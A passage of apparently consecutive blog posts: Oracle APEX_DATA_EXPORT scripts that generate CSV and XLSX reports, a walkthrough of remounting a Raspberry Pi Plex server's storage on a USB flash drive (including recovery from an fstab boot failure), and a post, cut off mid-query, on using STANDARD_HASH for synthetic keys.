DEPARTMENT_ID,DEPARTMENT_NAME,MANAGER_ID,LOCATION_ID
10,Administration,200,1700
20,Marketing,201,1800
30,Purchasing,114,1700
40,Human Resources,203,2400
50,Shipping,121,1500
60,IT,103,1400
70,Public Relations,204,2700
80,Sales,145,2500
90,Executive,100,1700
100,Finance,108,1700
110,Accounting,205,1700
120,Treasury,,1700
130,Corporate Tax,,1700
140,Control And Credit,,1700
150,Shareholder Services,,1700
160,Benefits,,1700
170,Manufacturing,,1700
180,Construction,,1700
190,Contracting,,1700
200,Operations,,1700
210,IT Support,,1700
220,NOC,,1700
230,IT Helpdesk,,1700
240,Government Sales,,1700
250,Retail Sales,,1700
260,Recruiting,,1700
270,Payroll,,1700
PL/SQL procedure successfully completed.
We can get away with using DBMS_OUTPUT as the result set is comparatively small. Under normal circumstances, you’ll probably want to save it into a table ( as in Amirreza’s post), or write it out to a file.
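If you do fancy the table option, a minimal sketch might look something like this – the REPORT_FILES table here is entirely hypothetical :
-- hypothetical holding table for generated report content
create table report_files
(
    file_name varchar2(128),
    created_on date default sysdate,
    content clob
)
/
-- ...then, in the PL/SQL block above, once v_export has been populated :
insert into report_files( file_name, content)
values( 'departments.csv', v_export.content_clob);
commit;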
In fact, writing to a file is exactly what we’ll be doing with the Excel output we’ll generate shortly.
First though, what if you don’t have a suitable APEX application lying around…
Creating an APEX application from SQL
NOTE – you only need to do this if you do not already have a suitable APEX Application available.
If you do then feel free to skip to the next bit, where we finally start generating XLSX files !
First, we need to check to see if there is an APEX workspace present for us to create the Application in :
select workspace, workspace_id
from apex_workspaces;
If this returns any rows then you should be OK to pick one of the workspaces listed and create your application in that.
Otherwise, you can create a Workspace by connecting to the database as a user with the APEX_ADMINISTRATOR_ROLE and running :
exec apex_instance_admin.add_workspace( p_workspace => 'HR_REPORT_FILES', p_primary_schema => 'HR');
…where HR_REPORT_FILES is the name of the workspace you want to create and HR is a schema that has access to the database objects you want to run your reports against.
Next, following Jeffrey Kemp’s sage advice, I can just create and then export an Application on any compatible APEX instance and then simply import the resulting file.
That’s right, it’ll work irrespective of the environment on which the export file is created, as long as it’s a compatible APEX version.
If you need them, the instructions for exporting an APEX application are here.
I’ve just clicked through the Create Application Wizard to produce an empty application using the HR schema and have then exported it to a file called apex22_hr_report_files_app.sql.
To import it, I ran the following script:
begin
apex_application_install.set_workspace('HR_REPORT_FILES');
apex_application_install.generate_application_id;
apex_application_install.generate_offset;
end;
/
@/home/mike/Downloads/apex22_hr_report_files_app.sql
Once it’s run we can confirm that the import was successful :
select application_id, application_name,
page_id, page_name
from apex_application_pages
where workspace = 'HR_REPORT_FILES'
/
APPLICATION_ID APPLICATION_NAME PAGE_ID PAGE_NAME
-------------- -------------------- ---------- --------------------
105 Lazy Reports 0 Global Page
105 Lazy Reports 1 Home
105 Lazy Reports 9999 Login Page
The add_workspace.sql script in the Github Repo executes both the create workspace and application import steps described here.
Right, where were we…
Generating an Excel file
First, we’ll need a directory object so we can write our Excel file out to disk. So, as a suitably privileged user :
create or replace directory hr_reports as '/opt/oracle/hr_reports';
grant read, write on directory hr_reports to hr;
OK – now to generate our report as an Excel…
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_context apex_exec.t_context;
v_export apex_data_export.t_export;
-- File handling variables
v_dir all_directories.directory_name%type := 'HR_REPORTS';
v_fname varchar2(128) := 'hr_departments_reports.xlsx';
v_fh utl_file.file_type;
v_buffer raw(32767);
v_amount integer := 32767;
v_pos integer := 1;
v_length integer;
begin
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
v_stmnt := 'select * from departments';
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'whatever' -- any string will do !
);
-- Create the query context...
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
-- ...and export the data into the v_export object
-- this time use the default - i.e. export to a BLOB, rather than a CLOB
v_export := apex_data_export.export
(
p_context => v_context,
p_format => apex_data_export.c_format_xlsx -- XLSX
);
apex_exec.close( v_context);
dbms_output.put_line('Writing file');
-- Now write the blob out to an xlsx file
v_length := dbms_lob.getlength( v_export.content_blob);
v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
while v_pos <= v_length loop
dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
utl_file.put_raw(v_fh, v_buffer, true);
v_pos := v_pos + v_amount;
end loop;
utl_file.fclose( v_fh);
dbms_output.put_line('File written to HR_REPORTS');
exception when others then
dbms_output.put_line(sqlerrm);
if utl_file.is_open( v_fh) then
utl_file.fclose(v_fh);
end if;
end;
/
As you can see, this script is quite similar to the csv version. The main differences are that, firstly, we’re saving the output as a BLOB rather than a CLOB, simply by not overriding the default behaviour when calling APEX_DATA_EXPORT.EXPORT.
Secondly, we’re writing the result out to a file.
Once we retrieve the file and open it, we can see that indeed, it is in xlsx format :
As well as generating a vanilla spreadsheet, APEX_DATA_EXPORT does have a few more tricks up its sleeve…
Adding an Aggregation
We can add a row count to the bottom of our report by means of the ADD_AGGREGATE procedure.
To do so, we need to modify the report query to produce the data to be used by the aggregate :
select department_id, department_name, manager_id, location_id,
count( 1) over() as record_count
from departments
As we don’t want to list the record count on every row, we need to exclude the record_count column from the result set by specifying the columns that we do actually want in the output. We can do this with calls to the ADD_COLUMN procedure :
apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_ID');
apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_NAME');
apex_data_export.add_column( p_columns => v_columns, p_name => 'MANAGER_ID');
apex_data_export.add_column( p_columns => v_columns, p_name => 'LOCATION_ID');
NOTE – column names passed in the P_NAME parameter in this procedure need to be in UPPERCASE.
Finally, we need to specify an aggregate itself using the ADD_AGGREGATE procedure :
apex_data_export.add_aggregate
(
p_aggregates => v_aggregates,
p_label => 'Data Row Count',
p_display_column => 'DEPARTMENT_ID',
p_value_column => 'RECORD_COUNT'
);
The finished script is called excel_aggregate.sql :
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_columns apex_data_export.t_columns;
v_aggregates apex_data_export.t_aggregates;
v_context apex_exec.t_context;
v_export apex_data_export.t_export;
-- File handling variables
v_dir all_directories.directory_name%type := 'HR_REPORTS';
v_fname varchar2(128) := 'aggregate.xlsx';
v_fh utl_file.file_type;
v_buffer raw(32767);
v_amount integer := 32767;
v_pos integer := 1;
v_length integer;
begin
-- We only need the first record returned by this cursor
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'anynameyoulike'
);
-- Add a row with a count of the records in the file
-- We need to add the relevant data to the query and then format it
v_stmnt :=
'select department_id, department_name, manager_id, location_id,
count( 1) over() as record_count
from departments';
-- Make sure only the data columns to display on the report, not the record_count
-- NOTE - in all of these procs, column names need to be passed as upper case literals
apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_ID');
apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_NAME');
apex_data_export.add_column( p_columns => v_columns, p_name => 'MANAGER_ID');
apex_data_export.add_column( p_columns => v_columns, p_name => 'LOCATION_ID');
apex_data_export.add_aggregate
(
p_aggregates => v_aggregates,
p_label => 'Data Row Count',
p_display_column => 'DEPARTMENT_ID',
p_value_column => 'RECORD_COUNT'
);
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
v_export := apex_data_export.export
(
p_context => v_context,
p_format => apex_data_export.c_format_xlsx, -- XLSX
p_columns => v_columns,
p_aggregates => v_aggregates
);
apex_exec.close( v_context);
v_length := dbms_lob.getlength( v_export.content_blob);
v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
while v_pos <= v_length loop
dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
utl_file.put_raw(v_fh, v_buffer, true);
v_pos := v_pos + v_amount;
end loop;
utl_file.fclose( v_fh);
dbms_output.put_line('File written to HR_REPORTS');
exception when others then
dbms_output.put_line(sqlerrm);
if utl_file.is_open( v_fh) then
utl_file.fclose(v_fh);
end if;
end;
/
When we run this, we now get a row count row at the bottom of the file :
Highlighting cells and rows
The ADD_HIGHLIGHT procedure allows us to apply conditional formatting to individual cells, or even entire rows.
Once again the values to determine this behaviour need to be included in the report query.
In this case, we specify a highlight_id value to be used in rendering the row.
This time, I have a new query and I want to apply formatting based on the value of the SALARY column.
If the value is below 6000 then I want to make the text red ( by applying highlighter_id 1).
Otherwise, I want to set the background colour to green for the entire row ( highlighter_id 2).
The query therefore is this :
select first_name, last_name, salary,
case when salary < 6000 then 1 else 2 end as fair_pay
from employees
where job_id = 'IT_PROG'
Highlight 1 is :
-- text in red for id 1
apex_data_export.add_highlight(
p_highlights => v_highlights,
p_id => 1,
p_value_column => 'FAIR_PAY',
p_display_column => 'SALARY',
p_text_color => '#FF0000' );
…and highlight 2 is :
-- Whole row with green background for id 2
apex_data_export.add_highlight
(
p_highlights => v_highlights,
p_id => 2,
p_value_column => 'FAIR_PAY',
p_text_color => '#000000', -- black
p_background_color => '#00ffbf' -- green
);
The finished script is excel_highlight.sql :
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_highlights apex_data_export.t_highlights;
v_context apex_exec.t_context;
v_export apex_data_export.t_export;
v_dir all_directories.directory_name%type := 'HR_REPORTS';
v_fname varchar2(128) := 'programmer_pay.xlsx';
v_fh utl_file.file_type;
v_buffer raw(32767);
v_amount integer := 32767;
v_pos integer := 1;
v_length integer;
begin
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'anynameyoulike'
);
-- Add a row with a count of the records in the file
-- We need to add the relevant data to the query and then format it
v_stmnt :=
q'[select first_name, last_name, salary,
case when salary < 6000 then 1 else 2 end as fair_pay
from employees
where job_id = 'IT_PROG']';
-- text in red for id 1
apex_data_export.add_highlight(
p_highlights => v_highlights,
p_id => 1,
p_value_column => 'FAIR_PAY',
p_display_column => 'SALARY',
p_text_color => '#FF0000' );
-- Whole row with green background for id 2
apex_data_export.add_highlight
(
p_highlights => v_highlights,
p_id => 2,
p_value_column => 'FAIR_PAY',
p_text_color => '#000000', -- black
p_background_color => '#00ffbf' -- green
);
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
-- Pass the highlights object into the export
v_export := apex_data_export.export
(
p_context => v_context,
p_format => apex_data_export.c_format_xlsx,
p_highlights => v_highlights
);
apex_exec.close( v_context);
v_length := dbms_lob.getlength( v_export.content_blob);
v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
while v_pos <= v_length loop
dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
utl_file.put_raw(v_fh, v_buffer, true);
v_pos := v_pos + v_amount;
end loop;
utl_file.fclose( v_fh);
dbms_output.put_line('File written to HR_REPORTS');
exception when others then
dbms_output.put_line(sqlerrm);
if utl_file.is_open( v_fh) then
utl_file.fclose(v_fh);
end if;
end;
/
…and the output…
Formatting with GET_PRINT_CONFIG
The GET_PRINT_CONFIG function offers a plethora of document formatting options…and a chance for me to demonstrate that I’m really more of a back-end dev.
To demonstrate just some of the available options, I have :
- changed the header and body font family to Times (default is Helvetica)
- set the heading text to be White and bold
- set the header background to be Dark Gray ( or Grey, if you prefer)
- set the body background to be Turquoise
- set the body font colour to be Midnight Blue
All of which looks like this :
v_print_config := apex_data_export.get_print_config
(
p_header_font_family => apex_data_export.c_font_family_times, -- Default is "Helvetica"
p_header_font_weight => apex_data_export.c_font_weight_bold, -- Default is "normal"
p_header_font_color => '#FFFFFF', -- White
p_header_bg_color => '#2F4F4F', -- DarkSlateGrey/DarkSlateGray
p_body_font_family => apex_data_export.c_font_family_times,
p_body_bg_color => '#40E0D0', -- Turquoise
p_body_font_color => '#191970' -- MidnightBlue
);
Note that, according to the documentation, GET_PRINT_CONFIG will also accept HTML colour names or RGB codes.
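So, assuming I’ve read the documentation correctly, a rather less hex-heavy version of the call above might look like this ( the colour names are standard HTML/CSS names) :
v_print_config := apex_data_export.get_print_config
(
    p_header_font_color => 'white',
    p_header_bg_color   => 'darkslategray',
    p_body_bg_color     => 'turquoise',
    p_body_font_color   => 'midnightblue'
);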
Anyway, the script is called excel_print_config.sql :
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_context apex_exec.t_context;
v_print_config apex_data_export.t_print_config;
v_export apex_data_export.t_export;
-- File handling variables
v_dir all_directories.directory_name%type := 'HR_REPORTS';
v_fname varchar2(128) := 'crayons.xlsx';
v_fh utl_file.file_type;
v_buffer raw(32767);
v_amount integer := 32767;
v_pos integer := 1;
v_length integer;
begin
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'anynameyoulike'
);
v_stmnt := 'select * from departments';
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
-- Let's do some formatting.
-- OK, let's just scribble with the coloured crayons...
v_print_config := apex_data_export.get_print_config
(
p_header_font_family => apex_data_export.c_font_family_times, -- Default is "Helvetica"
p_header_font_weight => apex_data_export.c_font_weight_bold, -- Default is "normal"
p_header_font_color => '#FFFFFF', -- White
p_header_bg_color => '#2F4F4F', -- DarkSlateGrey/DarkSlateGray
p_body_font_family => apex_data_export.c_font_family_times,
p_body_bg_color => '#40E0D0', -- Turquoise
p_body_font_color => '#191970' -- MidnightBlue
);
-- Specify the print_config in the export
v_export := apex_data_export.export
(
p_context => v_context,
p_format => apex_data_export.c_format_xlsx,
p_print_config => v_print_config
);
apex_exec.close( v_context);
v_length := dbms_lob.getlength( v_export.content_blob);
v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
while v_pos <= v_length loop
dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
utl_file.put_raw(v_fh, v_buffer, true);
v_pos := v_pos + v_amount;
end loop;
utl_file.fclose( v_fh);
dbms_output.put_line('File written to HR_REPORTS');
exception when others then
dbms_output.put_line(sqlerrm);
if utl_file.is_open( v_fh) then
utl_file.fclose(v_fh);
end if;
end;
/
…and the resulting file is about as garish as you’d expect…
On the off-chance that you might prefer a more subtle colour scheme, you can find a list of HTML colour codes here.
Pi-Eyed and Clueless – Adventures with Board and Flash Drive
Since setting up my Raspberry Pi as a Plex Media Server a few years ago, the reliable application of Moore’s Law has brought us to a point where a humble USB flash drive now has sufficient capacity to cope with all of my media files and then some.
Therefore, I felt it was probably time to retire the powered external HDD that had been doing service as storage and replace it with a nice, compact stick.
The Pi in question is a Pi3 and is running Raspbian 11 (Bullseye).
The main consideration here was that I wanted to ensure that the new storage was visible to Plex from the same location as before so that I didn’t have to go through the rigmarole of validating and correcting all of the metadata that Plex retrieves for each media file ( Movie details etc).
Having copied the relevant files from the HDD to the new Flash Drive, I was ready to perform this “simple” admin task.
The steps to accomplish this are set out below.
Also detailed are some of the issues I ran into and how I managed to solve them, just in case you’ve stumbled across this post in a desperate search for a solution to your beloved fruit-based computer having turned into a slice of Brick Pi. In fact, let’s start with…
Pi not booting after editing /etc/fstab
On one occasion, after editing the fstab file and rebooting, I found the Pi unresponsive.
Having connected a display and keyboard to the Pi and starting it again, I was greeted with the message :
"You are in emergency mode. After logging in, type "journalctl -xb" to view system logs, "systemctl reboot to reboot, "systemctl default" or ^D to try again to boot into the default mode.
Press Enter to continue
…and after pressing enter…
"Cannot open access to console, the root accoutn is locked.
See sulogin(8) man page for more details.
Press Enter to continue...
…after which pressing Enter seems to have little effect.
According to this Stack Exchange thread, one solution would be to remove the SD card from the Pi, mount it on a suitable filesystem on alternative hardware ( e.g. a laptop) and edit the /etc/fstab file to remove the offending entry.
I took the other route…
Start by rebooting and holding down the [Shift] key so that Raspbian takes you to the NOOBS screen.
Now, from the top menu, select Edit config. This opens an editor with two tabs – config and cmdline.txt
We want to edit the cmdline.txt so click on that tab.
Despite appearances, this file is all on a single line so when you append to it, you need to add a space at the start and not a newline. To persuade Raspbian to give us access to a command prompt, we need to append :
init=/bin/sh
Now, save the file then choose Exit (Esc) from the NOOBS menu so that the Pi continues to boot.
You should now be rewarded with a ‘#’ prompt.
At this point, the filesystem is mounted but is read only. As we want to fix the issue by editing (i.e. writing to) the /etc/fstab file, we need to remount it in read/write mode. We can do this by typing the following at the prompt :
mount -n -o remount,rw /
Now, finally, I can use nano to remove the offending entry from /etc/fstab
nano /etc/fstab
At this point, you have the option of editing the cmdline.txt so that the Pi starts normally, by editing the file :
nano /boot/cmdline.txt
Alternatively, you may prefer to let the Pi restart and hold down [SHIFT] and do the edit in the NOOBs screen.
You would then exit NOOBS and the Pi should boot normally.
Either way, we can reboot by typing :
reboot
…at the prompt.
Hopefully, you won’t need to go through any of this pain as what follows did work as expected…
Unmounting the old drive
First of all, we need to identify the device :
sudo fdisk -l |grep /dev/sda
In my case, there’s just one device – /dev/sda1.
Now I need to unmount it :
umount /dev/sda1
We then need to ensure that it isn’t mounted next time we boot
to do this, we need to edit /etc/fstab and comment out the appropriate entry :
sudo nano /etc/fstab
Rather than deleting it altogether, I’ve just commented out the relevant line, in case I need to put it back for any reason :
# Below is entry for Seagate external HDD via a powered USB Hub
#UUID=68AE9F66AE9F2C16 /mnt/usbstorage ntfs nofail,uid=pi,gid=pi 0 0
In order to make sure that this has all worked as expected, I physically disconnect the external HDD from the pi and restart it with
sudo reboot
The correct way to mount a Flash Drive
Well, these days the simplest way to mount the drive is just to plug it in to one of the USB ports on the Pi. Raspbian then automagically mounts it to :
/media/pi
Initially, I thought I’d try to simply create a symbolic link under the now empty mount point where the external HDD used to live :
ln -s ../../media/pi/SanDisk/Media /mnt/usbstorage
…and then restart the Plex Server…
sudo service plexmediaserver stop
sudo service plexmediaserver start
Unfortunately, whilst we don’t get any errors on the command line, Plex itself refuses to follow the link and insists that all of the media files under /mnt/usbstorage are “Unavailable”.
Therefore, we need to do things properly and explicitly mount the Flash Drive to the desired mount point.
First of all, we need to confirm the type of filesystem on the drive we want to mount.
Whilst fdisk gives us the device name, it seems to be hedging its bets as regards the filesystem type :
sudo fdisk -l |grep /dev/sda
Disk /dev/sda: 466.3 GiB, 500648902656 bytes, 977829888 sectors
/dev/sda1 7552 977829887 977822336 466.3G 7 HPFS/NTFS/exFAT
Fortunately, there’s a more reliable way to confirm the type, which gives us the UUID for the Flash Drive as well…
sudo blkid /dev/sda1
/dev/sda1: LABEL="SanDisk" UUID="8AF9-909A" TYPE="exfat" PARTUUID="c3072e18-01"
The type of the old external HDD was NTFS, so it’s likely I’ll need to download some packages to add exFat support on the pi :
sudo apt install exfat-fuse
sudo apt install exfat-utils
Once apt has done its thing and these packages are installed, we can then add an entry to fstab to mount the Flash Drive on the required directory every time the Pi starts :
sudo nano /etc/fstab
The line we need to add is in the format:
UUID=<flash drive UUID> <mount point> <file system type> <options> 0 0
The options I’ve chosen to specify are :
- defaults – use the default options rw, suid, dev, exec, auto, nouser and async
- users – Allow any user to mount and to unmount the filesystem, even when some other ordinary user mounted it.
- nofail – do not report errors for this device if it does not exist
- 0 – exclude from any system backup
- 0 – do not include this device in the fsck check
So, my new entry is :
UUID=8AF9-909A /mnt/usbstorage exfat defaults,users,nofail 0 0
Once these changes are saved, we can check that the command will work :
umount /dev/sda1
mount -a
If you don’t get any feedback from this command, it’s an indication that it worked as expected.
You should now be able to see the file system on the flash drive under /mnt/usbstorage :
ls -l /mnt/usbstorage/
total 2816
-rwxr-xr-x 1 root root 552605 Sep 23 2021 Install SanDisk Software.dmg
-rwxr-xr-x 1 root root 707152 Sep 23 2021 Install SanDisk Software.exe
drwxr-xr-x 5 root root 262144 Dec 31 16:19 Media
drwxr-xr-x 3 root root 262144 Apr 10 2018 other_plex_metadata
drwxr-xr-x 6 root root 262144 Mar 11 2017 Photos
-rwxr-xr-x 1 root root 300509 Sep 23 2021 SanDisk Software.pdf
One final step – reboot the pi once more to ensure that your mount is permanent.
With that done, I should be able to continue enjoying my media server, but with substantially less hardware.
References
There are a couple of sites that may be of interest :
There is an explanation of the fstab options here.
You can find further details on the cmdline.txt file here.
Using STANDARD_HASH to generate synthetic key values
In Oracle, identity columns are a perfect way of generating a synthetic key value as the underlying sequence will automatically provide you with a unique value every time it’s invoked, pretty much forever.
One minor disadvantage of sequence generated key values is that you cannot predict what they will be ahead of time.
This may be a bit of an issue if you need to provide traceability between an aggregated record and its component records, or if you want to update an existing aggregation in a table without recalculating it from scratch.
In such circumstances you may find yourself needing to write the key value back to the component records after generating the aggregation.
Even leaving aside the additional coding effort required, the write-back process may be quite time consuming.
This being the case, you may wish to consider an alternative to the sequence generated key value and instead, use a hashing algorithm to generate a unique key before creating the aggregation.
That’s your skeptical face.
You’re clearly going to take some convincing that this isn’t a completely bonkers idea.
Well, if you can bear with me, I’ll explain.
Specifically, what I’ll look at is :
- using the STANDARD_HASH function to generate a unique key
- the chances of the same hash being generated for different values
- before you rush out to buy a lottery ticket ( part one) – null values
- before you rush out to buy a lottery ticket (part two) – date formats
- before you rush out to buy a lottery ticket (part three) – synching the hash function inputs with the aggregation’s group by
- a comparison between the Hashing methods that can be used with STANDARD_HASH
Just before we dive in, I should mention Dani Schnider’s comprehensive article on this topic, which you can find here.
Example Table
I have a table called DISCWORLD_BOOKS_STAGE – a staging table that currently contains :
select *
from discworld_books_stage;
TITLE PAGES SUB_SERIES YOUNG_ADULT_FLAG
---------------------- ---------- ---------------------- ----------------
The Wee Free Men 404 TIFFANY ACHING Y
Monstrous Regiment 464 OTHER
A Hat Full of Sky 298 TIFFANY ACHING Y
Going Postal 483 INDUSTRIAL REVOLUTION
Thud 464 THE WATCH
Wintersmith 388 TIFFANY ACHING Y
Making Money 468 INDUSTRIAL REVOLUTION
Unseen Academicals 533 WIZARDS
I Shall Wear Midnight 434 TIFFANY ACHING Y
Snuff 370 THE WATCH
Raising Steam 372 INDUSTRIAL REVOLUTION
The Shepherd's Crown 338 TIFFANY ACHING Y
I want to aggregate a count of the books and total number of pages by Sub-Series and whether the book is a Young Adult title and persist it in a new table, which I’ll be updating periodically as new data arrives.
Using the STANDARD_HASH function, I can generate a unique value for each distinct sub_series, young_adult_flag value combination by running :
select
standard_hash(sub_series||'#'||young_adult_flag||'#') as cid,
sub_series,
young_adult_flag,
sum(pages) as total_pages,
count(title) as number_of_books
from discworld_books_stage
group by sub_series, young_adult_flag
order by 1
/
CID SUB_SERIES YA TOTAL_PAGES NO_BOOKS
---------------------------------------- ------------------------- -- ----------- ----------
08B0E5ECC3FD0CDE6732A9DBDE6FF2081B25DBE2 WIZARDS 533 1
8C5A3FA1D2C0D9ED7623C9F8CD5F347734F7F39E INDUSTRIAL REVOLUTION 1323 3
A7EFADC5EB4F1C56CB6128988F4F25D93FF03C4D OTHER 464 1
C66E780A8783464E89D674733EC16EB30A85F5C2 THE WATCH 834 2
CE0E74B86FEED1D00ADCAFF0DB6DFB8BB2B3BFC6 TIFFANY ACHING Y 1862 5
OK, so we’ve managed to get unique values across a whole five rows. But, let’s face it, generating a synthetic key value in this way does introduce the risk of a duplicate hash being generated for multiple unique records.
As for how much of a risk…
Odds on a collision
In hash terms, generating the same value for two different inputs is known as a collision.
The odds on this happening for each of the methods usable with STANDARD_HASH are :
Method     Collision Odds
------     --------------
MD5        2^64
SHA1       2^80
SHA256     2^128
SHA384     2^192
SHA512     2^256
Figures taken from https://en.wikipedia.org/wiki/Hash_function_security_summary
By default, STANDARD_HASH uses SHA1. The odds of a SHA1 collision are :
1 in 1,208,925,819,614,629,174,706,176
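If you don’t fancy taking Wikipedia’s word for it, the database will happily do the arithmetic ( 2 to the power of 80) for you :
select to_char( power(2, 80), '9,999,999,999,999,999,999,999,999') as sha1_collision_odds
from dual;

SHA1_COLLISION_ODDS
----------------------------------
 1,208,925,819,614,629,174,706,176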
By comparison, winning the UK Lottery Main Draw is pretty much nailed on at odds of
1 in 45,057,474
So, if you do happen to come a cropper on that septillion-to-one ( yes, that’s really a number) chance then your next move may well be to run out and buy a lottery ticket.
Before you do, however, it’s worth checking to see that you haven’t fallen over one or more of the following…
Remember that the first argument we pass in to the STANDARD_HASH function is a concatenation of values.
If we have two nullable columns together we may get the same concatenated output where one of the values is null :
with nulltest as (
select 1 as id, 'Y' as flag1, null as flag2 from dual union all
select 2, null, 'Y' from dual
)
select id, flag1, flag2,
flag1||flag2 as input_string,
standard_hash(flag1||flag2) as hash_val
from nulltest
/
ID F F INPUT_STRING HASH_VAL
---------- - - ------------ ----------------------------------------
1 Y Y 23EB4D3F4155395A74E9D534F97FF4C1908F5AAC
2 Y Y 23EB4D3F4155395A74E9D534F97FF4C1908F5AAC
To resolve this, you can use the NVL function on each column in the concatenated input to the STANDARD_HASH function.
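For example ( a quick sketch, using ‘~’ as an arbitrary placeholder for null) :
with nulltest as (
    select 1 as id, 'Y' as flag1, null as flag2 from dual union all
    select 2, null, 'Y' from dual
)
select id,
    standard_hash( nvl( flag1, '~')||nvl( flag2, '~')) as hash_val
from nulltest
/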
However, this is likely to involve a lot of typing if you have a large number of columns.
Instead, you may prefer to simply concatenate a single character after each column:
with nulltest as (
select 1 as id, 'Y' as flag1, null as flag2 from dual union all
select 2, null, 'Y' from dual
)
select id, flag1, flag2,
flag1||'#'||flag2||'#' as input_string,
standard_hash(flag1||'#'||flag2||'#') as hash_val
from nulltest
/
ID F F INPUT_STRING HASH_VAL
---------- - - ------------ ----------------------------------------
1 Y Y## 2AABF2E3177E9A5EFBD3F65FCFD8F61C3C355D67
2 Y #Y# F84852DE6DC29715832470A40B63AA4E35D332D1
Whilst concatenating a character into the input string does solve the null issue, it does mean we also need to consider…
Date Formats
If you just pass a date into STANDARD_HASH, it doesn’t care about the date format :
select
sys_context('userenv', 'nls_date_format') as session_format,
standard_hash(trunc(sysdate))
from dual;
SESSION_FORMAT STANDARD_HASH(TRUNC(SYSDATE))
-------------- ----------------------------------------
DD-MON-YYYY 9A2EDB0D5A3D69D6D60D6A93E04535931743EC1A
alter session set nls_date_format = 'YYYY-MM-DD';
select
sys_context('userenv', 'nls_date_format') as session_format,
standard_hash(trunc(sysdate))
from dual;
SESSION_FORMAT STANDARD_HASH(TRUNC(SYSDATE))
-------------- ----------------------------------------
YYYY-MM-DD 9A2EDB0D5A3D69D6D60D6A93E04535931743EC1A
However, if the date is part of a concatenated value, the NLS_DATE_FORMAT will affect the output value as the date is implicitly converted to a string…
alter session set nls_date_format = 'DD-MON-YYYY';
Session altered.
select standard_hash(trunc(sysdate)||'XYZ') from dual;
STANDARD_HASH(TRUNC(SYSDATE)||'XYZ')
----------------------------------------
DF0A192333BDF860AAB338C66D9AADC98CC2BA67
alter session set nls_date_format = 'YYYY-MM-DD';
Session altered.
select standard_hash(trunc(sysdate)||'XYZ') from dual;
STANDARD_HASH(TRUNC(SYSDATE)||'XYZ')
----------------------------------------
FC2999F8249B89FE88D4C0394CC114A85DAFBBEF
Therefore, it’s probably a good idea to explicitly set the NLS_DATE_FORMAT in the session before generating the hash.
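Alternatively, you could take the session settings out of the equation altogether by making the conversion explicit – something along these lines :
select standard_hash( to_char( trunc( sysdate), 'YYYY-MM-DD')||'XYZ') as hash_val
from dual;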
Use the same columns in the STANDARD_HASH as you do in the GROUP BY
I have another table called DISCWORLD_BOOKS :
select sub_series, main_character
from discworld_books
where sub_series = 'DEATH';
SUB_SERIES MAIN_CHARACTER
-------------------- ------------------------------
DEATH MORT
DEATH DEATH
DEATH DEATH
DEATH SUSAN STO HELIT
DEATH LU TZE
If I group by SUB_SERIES and MAIN_CHARACTER, I need to ensure that I include those columns as input into the STANDARD_HASH function.
Otherwise, I’ll get the same hash value for different groups.
For example, running this will give us the same hash for each aggregated row in the result set :
select
sub_series,
main_character,
count(*),
standard_hash(sub_series||'#') as cid
from discworld_books
where sub_series = 'DEATH'
group by sub_series, main_character,
standard_hash(sub_series||main_character)
order by 1
/
SUB_SERIES MAIN_CHARACTER COUNT(*) CID
-------------------- ------------------------------ ---------- ----------------------------------------
DEATH MORT 1 5539A1C5554935057E60CBD021FBFCD76CB2EB93
DEATH DEATH 2 5539A1C5554935057E60CBD021FBFCD76CB2EB93
DEATH LU TZE 1 5539A1C5554935057E60CBD021FBFCD76CB2EB93
DEATH SUSAN STO HELIT 1 5539A1C5554935057E60CBD021FBFCD76CB2EB93
What we’re actually looking for is :
select
sub_series,
main_character,
count(*),
standard_hash(sub_series||'#'||main_character||'#') as cid
from discworld_books
where sub_series = 'DEATH'
group by sub_series, main_character,
